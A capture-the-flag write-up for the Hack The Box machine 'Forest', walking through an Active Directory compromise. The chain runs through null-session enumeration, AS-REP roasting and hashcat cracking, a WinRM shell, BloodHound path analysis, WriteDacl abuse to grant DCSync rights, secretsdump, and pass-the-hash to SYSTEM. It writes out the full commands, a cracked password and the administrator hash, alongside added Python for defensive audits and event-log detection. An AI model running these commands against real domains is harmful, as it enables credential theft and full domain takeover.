This is a write-up for an easy Windows box on hackthebox.eu named Forest. It was a unique box in the sense that there was no web application as an attack surface. We had to exploit a null session to get a hash of a user, which we then use on the box to get a shell. From that shell, we run Bloodhound to get a path to escalate our user account privilege and then use that account to dump secrets, using those secrets we login to the box as administrator.
As usual, we will start with nmap (the IP might be different for you)
ports=$(nmap -p- --min-rate=1000 -T4 10.129.1.77 | grep '^[0-9]' | cut -d '/' -f 1 | tr '\n' ',' | sed 's/,$//')
nmap -sC -sV -p$ports 10.129.1.77
Looking at the results we can see there are multiple ports open
Starting Nmap 7.80 ( https://nmap.org ) at 2020-10-31 11:27 EDT
Nmap scan report for 10.129.1.77
Host is up (0.21s latency).
PORT STATE SERVICE VERSION
53/tcp open domain?
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2020-10-31 15:36:34Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Default-First-Site-Name)
445/tcp open microsoft-ds Windows Server 2016 Standard 14393 microsoft-ds (workgroup: HTB)
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
9389/tcp open mc-nmf .NET Message Framing
47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
49664/tcp open msrpc Microsoft Windows RPC
49665/tcp open msrpc Microsoft Windows RPC
49666/tcp open msrpc Microsoft Windows RPC
49667/tcp open msrpc Microsoft Windows RPC
49671/tcp open msrpc Microsoft Windows RPC
49676/tcp open msrpc Microsoft Windows RPC
49677/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49682/tcp open msrpc Microsoft Windows RPC
49694/tcp open msrpc Microsoft Windows RPC
49748/tcp open msrpc Microsoft Windows RPC
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
Service Info: Host: FOREST; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: 2h28m49s, deviation: 4h02m30s, median: 8m48s
| OS: Windows Server 2016 Standard 14393 (Windows Server 2016 Standard 6.3)
| Computer name: FOREST
| NetBIOS computer name: FOREST\x00
| Domain name: htb.local
| Forest name: htb.local
| FQDN: FOREST.htb.local
|_ System time: 2020-10-31T08:38:59-07:00
| account_used: <blank>
| authentication_level: user
| challenge_response: supported
|_ message_signing: required
|_ Message signing enabled and required
| date: 2020-10-31T15:38:58
|_ start_date: 2020-10-31T15:20:47

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 287.87 seconds
We will start with SMB, running smbclient to list shares
smbclient -L 10.129.1.77
We can see that the anonymous login was successful but no shares were listed.
We move on to rpcclient and check whether we can enumerate users on the box by authenticating with a null session.
Funny thing: null authentication lets you enumerate domains as well as users when it is enabled. It was a feature of Windows Server 2003 and 2008; later versions remove it on a fresh installation, but on an upgrade from an older Windows Server the functionality is not disabled, since users might still depend on it.
rpcclient -U '' 10.129.1.77
And we get a session
Let’s enumerate users
We can see a few users that could be useful.
Note that we trimmed a large portion of the user list, mostly default accounts or accounts created by programs; a brute force against the box would not have been possible with those accounts anyway.
Among the users, svc-alfresco looks like a service account, judging by its naming convention. We can confirm this in rpcclient by running the following queries.
As we don't have anything solid on the box yet, we turn to the impacket tools, starting with GetNPUsers.py. It finds all users that don't require Kerberos pre-authentication and requests their encrypted AS-REP (TGT) material, which can then be cracked offline.
We copy the script to our working directory and run the command
python3 GetNPUsers.py -dc-ip 10.129.1.77 -request 'htb.local/' -format hashcat
And we get a user account dumped. We specify the format as hashcat so that the dump can be fed straight to hashcat.
Now, as we have a user and its hash let’s see if we can crack the hash and get into the box.
Let’s run hashcat
hashcat -m 18200 forest-hash /usr/share/wordlists/rockyou.txt -r /usr/share/hashcat/rules/InsidePro-PasswordsPro.rule
And looking at the results we can see that we have cracked the password and it is ‘s3rvice’
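The weakness this whole step relies on is one bit in userAccountControl, and the request it produces leaves a very recognisable trace in the domain controller's security log. The following Python is an added example for the defender's side, not code from the write-up or from impacket: an audit that decodes userAccountControl and lists enabled accounts with DONT_REQ_PREAUTH set (exactly what GetNPUsers.py hunts for), plus a detection over constructed Event 4768 (Kerberos TGT request) lines, where a successful request with Pre-Authentication Type 0 means the KDC handed out crackable material without any pre-authentication. The LDAP records, flag values and log lines are constructed for the example; the key=value log format is a condensed stand-in for the real event XML.

```python
"""Defender-side checks for the AS-REP roasting weakness described above.

Added example, not part of the write-up or of impacket. Two checks:
  1. audit LDAP-style user records for enabled accounts whose
     userAccountControl carries DONT_REQ_PREAUTH;
  2. detect successful Event 4768 (TGT requested) entries issued without
     pre-authentication (PreAuthType 0), the fingerprint of AS-REP roasting.
"""

# userAccountControl bit flags (documented Windows values; subset)
UAC_FLAGS = {
    0x0002: "ACCOUNTDISABLE",
    0x0010: "LOCKOUT",
    0x0020: "PASSWD_NOTREQD",
    0x0200: "NORMAL_ACCOUNT",
    0x10000: "DONT_EXPIRE_PASSWORD",
    0x80000: "TRUSTED_FOR_DELEGATION",
    0x400000: "DONT_REQ_PREAUTH",
}
DONT_REQ_PREAUTH = 0x400000
ACCOUNTDISABLE = 0x0002


def decode_uac(value):
    """Return the flag names set in a userAccountControl integer, lowest bit first."""
    return [name for bit, name in sorted(UAC_FLAGS.items()) if value & bit]


def roastable_accounts(records):
    """Enabled accounts that skip Kerberos pre-authentication.

    `records` is an iterable of dicts with sAMAccountName and an integer
    userAccountControl, as an LDAP query for (objectClass=user) would return.
    Disabled accounts are skipped: the KDC will not issue for them anyway.
    """
    out = []
    for rec in records:
        uac = rec["userAccountControl"]
        if uac & DONT_REQ_PREAUTH and not uac & ACCOUNTDISABLE:
            out.append(rec["sAMAccountName"])
    return out


# Constructed sample directory records; the flag values are assumptions made
# for this example, not data taken from the box.
SAMPLE_LDAP = [
    {"sAMAccountName": "svc-alfresco", "userAccountControl": 0x400200},
    {"sAMAccountName": "sebastien", "userAccountControl": 0x10200},
    {"sAMAccountName": "old-svc", "userAccountControl": 0x400202},  # disabled
]


def parse_event_line(line):
    """Parse one 'key=value key=value' line into a dict (constructed format)."""
    return dict(tok.split("=", 1) for tok in line.split())


def asrep_roast_alerts(log_text):
    """Flag successful 4768 events issued without pre-authentication.

    PreAuthType 0 = 'Logon without Pre-Authentication'; Status 0x0 = success.
    TicketEncryptionType 0x17 (RC4-HMAC) is the cheap-to-crack case that
    hashcat mode 18200 targets, so it is returned alongside for triage.
    """
    alerts = []
    for line in log_text.splitlines():
        if not line.strip():
            continue
        ev = parse_event_line(line)
        if ev.get("EventID") != "4768":
            continue
        if ev.get("PreAuthType") == "0" and ev.get("Status") == "0x0":
            alerts.append((ev["TargetUserName"], ev["IpAddress"],
                           ev["TicketEncryptionType"]))
    return alerts


# Constructed sample security-log lines, condensed to key=value form.
SAMPLE_4768 = """\
EventID=4768 TargetUserName=svc-alfresco PreAuthType=0 TicketEncryptionType=0x17 IpAddress=::ffff:10.10.14.41 Status=0x0
EventID=4768 TargetUserName=sebastien PreAuthType=2 TicketEncryptionType=0x12 IpAddress=::ffff:10.129.1.50 Status=0x0
EventID=4768 TargetUserName=FOREST$ PreAuthType=2 TicketEncryptionType=0x12 IpAddress=::ffff:10.129.1.77 Status=0x0
EventID=4768 TargetUserName=nosuchuser PreAuthType=- TicketEncryptionType=0xffffffff IpAddress=::ffff:10.10.14.41 Status=0x6
"""

if __name__ == "__main__":
    for rec in SAMPLE_LDAP:
        print(rec["sAMAccountName"], decode_uac(rec["userAccountControl"]))
    print("roastable:", roastable_accounts(SAMPLE_LDAP))
    print("alerts:", asrep_roast_alerts(SAMPLE_4768))
```

The audit half is the fix: clear DONT_REQ_PREAUTH on every account it lists (or give the service account a long random password and AES-only Kerberos), after which hashcat has nothing useful to work on. The detection half is what you would run against the DC's security log to catch the request itself.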
We already saw in the nmap output that port 5985 is open, so we can try to connect via WinRM and get a shell. We will use evil-winrm to connect.
evil-winrm -i 10.129.1.77 -u svc-alfresco -p s3rvice
And we get a shell
We have a low-privilege service account on the system and need to escalate our privileges.
We will start with BloodHound. To do this we host an HTTP server to load the SharpHound script onto the victim's machine, and create an SMB share so that we can pull the BloodHound output back to our local machine.
Let's start the Python HTTP server
sudo python3 -m http.server 80
Let's create the SMB share on our local machine, using impacket-smbserver
sudo impacket-smbserver tmp $(pwd) -smb2support -user miku -password password
Now we have to create a new PSDrive to connect to the share; for that we need to put the password into a credential object. We run the following commands in the shell
$pass = convertto-securestring 'password' -AsPlainText -Force
$cred = New-Object System.Management.Automation.PSCredential ('miku', $pass)
Now to connect,
New-PSDrive -Name miku -PSProvider FileSystem -Credential $cred -Root \\10.10.14.41\tmp
From the output we can confirm our PSDrive was created.
Let's load the script on the victim's machine and run it.
After SharpHound finishes we will have a zip file containing the results. We copy this file to the PSDrive.
xcopy 'C:\Users\svc-alfresco\Documents\20201031104759_BloodHound.zip' .
We now need to run BloodHound and check for paths to escalate our privileges.
First we start the neo4j console and then BloodHound.
We drag the zip file into the BloodHound window and it gets analyzed after a short while.
Once the zip file has been analyzed, let's find our user and mark it as owned.
Looking for paths, we start from Shortest Paths from Owned Principals. It shows that svc-alfresco is a member of Service Accounts, Service Accounts is a member of Privileged IT Accounts, which is a member of Account Operators. Account Operators is a member of Exchange Windows Permissions. Exchange Windows Permissions has WriteDacl permission on HTB.LOCAL.
The Account Operators group grants limited account creation privileges to a user. Members of this group can create and modify most types of accounts, including those of users, local groups, and global groups, and members can log in locally to domain controllers.
Members of the Account Operators group cannot manage the Administrator user account, the user accounts of administrators, or the Administrators, Server Operators, Account Operators, Backup Operators, or Print Operators groups. Members of this group cannot modify user rights.
We can abuse WriteDacl on the domain object to grant us DCSync rights on HTB.LOCAL.
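The path BloodHound drew is nothing more than a breadth-first search over group-membership and ACL edges, and the same search is a useful audit for anyone defending a domain: which ordinary principals can reach a high-value object through nesting nobody remembers creating? The Python below is an added example, not the write-up's or BloodHound's code. Its edge list is constructed from the relationships the post lists for svc-alfresco; the extra principals (sebastien, Domain Users, Users) are assumptions added so the search has a negative case.

```python
"""Nested-group path search of the kind BloodHound performed above.

Added example, not code from the write-up or from BloodHound. MemberOf edges
model (nested) group membership; the WriteDacl edge models the ACL entry the
post describes. Run it as an audit: every principal that reaches the domain
object needs a reason to, or its membership chain needs breaking.
"""
from collections import deque

# Constructed edge list: (child, relation, parent). The svc-alfresco chain is
# the one the write-up reports; sebastien/Domain Users/Users are assumptions.
EDGES = [
    ("SVC-ALFRESCO", "MemberOf", "SERVICE ACCOUNTS"),
    ("SERVICE ACCOUNTS", "MemberOf", "PRIVILEGED IT ACCOUNTS"),
    ("PRIVILEGED IT ACCOUNTS", "MemberOf", "ACCOUNT OPERATORS"),
    ("ACCOUNT OPERATORS", "MemberOf", "EXCHANGE WINDOWS PERMISSIONS"),
    ("EXCHANGE WINDOWS PERMISSIONS", "WriteDacl", "HTB.LOCAL"),
    ("SEBASTIEN", "MemberOf", "DOMAIN USERS"),
    ("DOMAIN USERS", "MemberOf", "USERS"),
]


def build_graph(edges):
    """Adjacency list: node -> [(relation, neighbour), ...]."""
    graph = {}
    for src, rel, dst in edges:
        graph.setdefault(src.upper(), []).append((rel, dst.upper()))
    return graph


def shortest_path(graph, start, target):
    """BFS from start to target; returns [(src, rel, dst), ...] or None.

    BFS gives the fewest hops, which is what 'Shortest Path' in BloodHound
    means; an empty list means start and target are the same node.
    """
    start, target = start.upper(), target.upper()
    prev = {start: None}
    queue = deque([start])
    while queue:
        node = queue.popleft()
        if node == target:
            break
        for rel, nxt in graph.get(node, []):
            if nxt not in prev:
                prev[nxt] = (node, rel)
                queue.append(nxt)
    if target not in prev:
        return None
    path = []
    node = target
    while prev[node] is not None:
        parent, rel = prev[node]
        path.append((parent, rel, node))
        node = parent
    return list(reversed(path))


def principals_with_path(graph, principals, target):
    """Audit helper: which of the given principals can reach target at all."""
    return [p.upper() for p in principals
            if shortest_path(graph, p, target) is not None]


def describe(path):
    """Render a path as one readable line."""
    return " -> ".join(f"{src} -({rel})-> {dst}" for src, rel, dst in path)


if __name__ == "__main__":
    g = build_graph(EDGES)
    for user in ("svc-alfresco", "sebastien"):
        p = shortest_path(g, user, "htb.local")
        print(user, ":", describe(p) if p else "no path")
```

The audit loop at the bottom is the point: run it with the target set to the domain object (or any Tier 0 group) and every principal it prints has an escalation path that should be either justified or removed, typically by pulling the nested group out of Account Operators or stripping WriteDacl from the Exchange group.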
To abuse this we will first create a new user, in order to keep the current account safe in case we need it again. To create a user
net user miku miku@123 /add /domain
Now we add it to the Exchange Windows Permissions group
net group "Exchange Windows Permissions" /add miku
Now, with the help of PowerView, we abuse WriteDacl. PowerView is part of PowerSploit, which can be downloaded from GitHub. We copy the PowerView.ps1 script to our web server directory and load it in the remote shell the same way as before. To load the script in the shell we run
We again create a credential object for the password, this time for the user we created
$pass = convertto-securestring 'miku@123' -AsPlainText -Force
$cred = New-Object System.Management.Automation.PSCredential ('HTB\miku', $pass)
Now, we run the following command to grant us DCSync rights on our account
Add-DomainObjectAcl -Credential $cred -TargetIdentity "DC=htb,DC=local" -PrincipalIdentity miku -Rights DCSync
Once we have the rights we dump the secrets from the machine and use them to log in as administrator.
To dump the secrets we use another impacket tool, secretsdump.py. If it runs successfully, our rights were assigned correctly and the secrets get dumped.
python3 secretsdump.py htb.local/miku:miku@123@10.129.1.77
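A secretsdump run with DCSync rights is a directory replication request, and a domain controller audits those as Event 4662 on the domain object with the replication extended rights in the Properties field. The only legitimate requesters are other domain controllers (and a short allow-list such as a directory sync service account), so a non-DC subject asking for DS-Replication-Get-Changes-All is a high-confidence alert. The Python below is an added example of that detection, not code from the write-up or from impacket; the 4662 records are constructed for the example, while the three replication-right GUIDs are the documented Active Directory schema values.

```python
"""Detect DCSync-style replication requests in Event 4662 records.

Added example, not part of the write-up. A 4662 'An operation was performed
on an object' event carries the GUIDs of the extended rights exercised; the
directory-replication rights below are what secretsdump.py needs. Domain
controllers replicate constantly, so subjects are compared against the set
of DC computer accounts before alerting.
"""
import re

# Extended-right GUIDs from the Active Directory schema
REPLICATION_RIGHTS = {
    "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes",
    "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes-All",
    "89e95b76-444d-4c62-991a-0facbeda640c": "DS-Replication-Get-Changes-In-Filtered-Set",
}
GUID_RE = re.compile(r"[0-9a-f]{8}-(?:[0-9a-f]{4}-){3}[0-9a-f]{12}", re.I)


def replication_rights_used(properties):
    """Names of replication rights found among the GUIDs in a Properties field."""
    found = {REPLICATION_RIGHTS[g.lower()]
             for g in GUID_RE.findall(properties)
             if g.lower() in REPLICATION_RIGHTS}
    return sorted(found)


def dcsync_alerts(events, dc_accounts):
    """Return (subject, rights) for replication requests by non-DC accounts.

    `events` are dicts with the 4662 fields used here; `dc_accounts` is the
    set of upper-cased DC computer account names (e.g. {"FOREST$"}). Extend
    it with any audited sync account that legitimately replicates.
    """
    alerts = []
    for ev in events:
        if ev.get("EventID") != 4662:
            continue
        rights = replication_rights_used(ev.get("Properties", ""))
        if not rights:
            continue  # ordinary attribute access, not replication
        subject = ev["SubjectUserName"]
        if subject.upper() in dc_accounts:
            continue  # DC-to-DC replication is expected
        alerts.append((subject, rights))
    return alerts


# Constructed sample events. ObjectType is the domainDNS class GUID; the
# AccessMask 0x100 (Control Access) is what extended-right checks log.
# The GUID in the third record is a placeholder, not a real right.
DOMAIN_OBJECT = "%{19195a5b-6da0-11d0-afd3-00c04fd930c9}"
REPL_PROPS = ("%%7688 {1131f6aa-9c07-11d1-f79f-00c04fc2dcd2} "
              "{1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}")
SAMPLE_4662 = [
    {"EventID": 4662, "SubjectUserName": "FOREST$", "SubjectDomainName": "HTB",
     "ObjectType": DOMAIN_OBJECT, "AccessMask": "0x100", "Properties": REPL_PROPS},
    {"EventID": 4662, "SubjectUserName": "miku", "SubjectDomainName": "HTB",
     "ObjectType": DOMAIN_OBJECT, "AccessMask": "0x100", "Properties": REPL_PROPS},
    {"EventID": 4662, "SubjectUserName": "sebastien", "SubjectDomainName": "HTB",
     "ObjectType": "%{bf967aba-0de6-11d0-a285-00aa003049e2}", "AccessMask": "0x10",
     "Properties": "%%7685 {00000000-0000-0000-0000-000000000000}"},
]

if __name__ == "__main__":
    for subject, rights in dcsync_alerts(SAMPLE_4662, {"FOREST$"}):
        print(f"ALERT: {subject} requested {', '.join(rights)}")
```

Two caveats for anyone wiring this into a SIEM: 4662 is only emitted when the "Audit Directory Service Access" subcategory is on and the domain object's SACL audits Control Access, and the Get-Changes-All right is the one that exposes password hashes, so treat it as the high-severity case even if Get-Changes alone is seen from tooling you recognise.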
Looking at the output, quite a lot of secrets were dumped.
Now we use crackmapexec to check whether the administrator hash works. To do that run
crackmapexec smb 10.129.1.77 -u administrator -H aad3b435b51404eeaad3b435b51404ee:32693b11e6aa90eb43d32c72a07ceea6
It shows Pwn3d!, which means we can get a shell with this account.
We use another impacket tool, psexec.py, to connect to the machine.
python3 psexec.py -hashes aad3b435b51404eeaad3b435b51404ee:32693b11e6aa90eb43d32c72a07ceea6 administrator@10.129.1.77
Voila! We get a shell back, running “whoami” we get that we have the shell as “nt authority\system”.
Hope you liked this write-up on Forest from hackthebox. Comments and Claps are appreciated.